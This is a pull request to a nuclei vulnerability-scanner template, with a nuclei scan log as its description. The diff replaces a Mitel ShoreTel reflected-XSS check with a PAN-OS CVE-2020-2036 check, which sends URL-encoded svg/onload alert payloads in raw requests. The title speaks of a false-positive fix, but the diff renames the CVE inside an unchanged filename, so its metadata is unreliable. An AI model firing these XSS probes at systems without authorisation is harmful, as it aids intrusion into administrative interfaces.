### PR TITLE
fix CVE-2020-28351 false-positive 

### DIFF
--- a/http/cves/2020/CVE-2020-28351.yaml
+++ b/http/cves/2020/CVE-2020-28351.yaml
@@ -1,49 +1,53 @@
-id: CVE-2020-28351
+id: CVE-2020-2036
 
 info:
-  name: Mitel ShoreTel 19.46.1802.0 Devices - Cross-Site Scripting
-  author: pikpikcu
-  severity: medium
-  description: Mitel ShoreTel 19.46.1802.0 devices and their conference component are vulnerable to an unauthenticated attacker conducting reflected cross-site scripting attacks via the PATH_INFO variable to index.php due to insufficient validation for the time_zone object in the HOME_MEETING& page.
+  name: Palo Alto Networks PAN-OS Web Interface - Cross Site-Scripting
+  author: madrobot,j4vaovo
+  severity: high
+  description: |
+    PAN-OS management web interface is vulnerable to reflected cross-site scripting. A remote attacker able to convince an administrator with an active authenticated session on the firewall management interface to click on a crafted link to that management web interface could potentially execute arbitrary JavaScript code in the administrator's browser and perform administrative actions. This issue impacts: PAN-OS 8.1 versions earlier than PAN-OS 8.1.16; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9.
   reference:
-    - https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html
-    - https://www.mitel.com/articles/what-happened-shoretel-products
-    - https://nvd.nist.gov/vuln/detail/CVE-2020-28351
-    - http://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html
-    - https://github.com/dievus/cve-2020-28351
+    - https://swarm.ptsecurity.com/swarm-of-palo-alto-pan-os-vulnerabilities/
+    - https://security.paloaltonetworks.com/CVE-2020-2036
+    - https://nvd.nist.gov/vuln/detail/CVE-2020-2036
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 6.1
-    cve-id: CVE-2020-28351
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
+    cvss-score: 8.8
+    cve-id: CVE-2020-2036
     cwe-id: CWE-79
-    epss-score: 0.00314
-    cpe: cpe:2.3:o:mitel:shoretel_firmware:19.46.1802.0:*:*:*:*:*:*:*
+    epss-score: 0.0109
+    cpe: cpe:2.3:o:paloaltonetworks:pan-os:*:*:*:*:*:*:*:*
   metadata:
-    max-request: 1
-    vendor: mitel
-    product: shoretel_firmware
-  tags: packetstorm,cve,cve2020,shoretel,xss
+    max-request: 3
+    vendor: paloaltonetworks
+    product: pan-os
+  tags: cve,cve2020,vpn,xss
 
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME"
+  - raw:
+      - |
+        GET /_404_/%22%3E%3Csvg%2Fonload%3Dalert(1337)%3E HTTP/1.1
+        Host: {{Hostname}}
 
-    headers:
-      Content-Type: application/x-www-form-urlencoded
+      - |
+        GET /unauth/php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(7331)%3E HTTP/1.1
+        Host: {{Hostname}}
+
+      - |
+        GET /php/change_password.php/%22%3E%3Csvg%2Fonload%3Dalert(7331)%3E HTTP/1.1
+        Host: {{Hostname}}
+
+    stop-at-first-match: true
 
     matchers-condition: and
     matchers:
-      - type: word
-        part: body
-        words:
-          - '</script><script>alert(document.domain)</script>'
+      - type: dsl
+        dsl:
+          - "!contains(tolower(body_1), '<svg/onload=alert(1337)>')"
+        condition: and
 
-      - type: word
-        part: header
-        words:
-          - 'Content-Type: text/html'
-
-      - type: status
-        status:
-          - 200
+      - type: dsl
+        dsl:
+          - "status_code_2 == 200 && contains(header_2, 'text/html') && contains(tolower(body_2), '<svg/onload=alert(7331)>')"
+          - "status_code_3 == 200 && contains(header_3, 'text/html') && contains(tolower(body_3), '<svg/onload=alert(7331)>')"
+        condition: or


### PR DESCRIPTION
````
 nuclei -u http://hydass.be -id CVE-2020-2036

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v2.9.6

                projectdiscovery.io

[WRN] Found 16 template[s] loaded with deprecated paths, update before v2.9.5 for continued support.
[INF] Current nuclei version: v2.9.6 (outdated)
[INF] Current nuclei-templates version: v9.6.0 (latest)
[INF] New templates added in latest release: 33
[INF] Templates loaded for current scan: 1
[INF] Targets loaded for current scan: 1
[INF] No results found. Better luck next time!

````
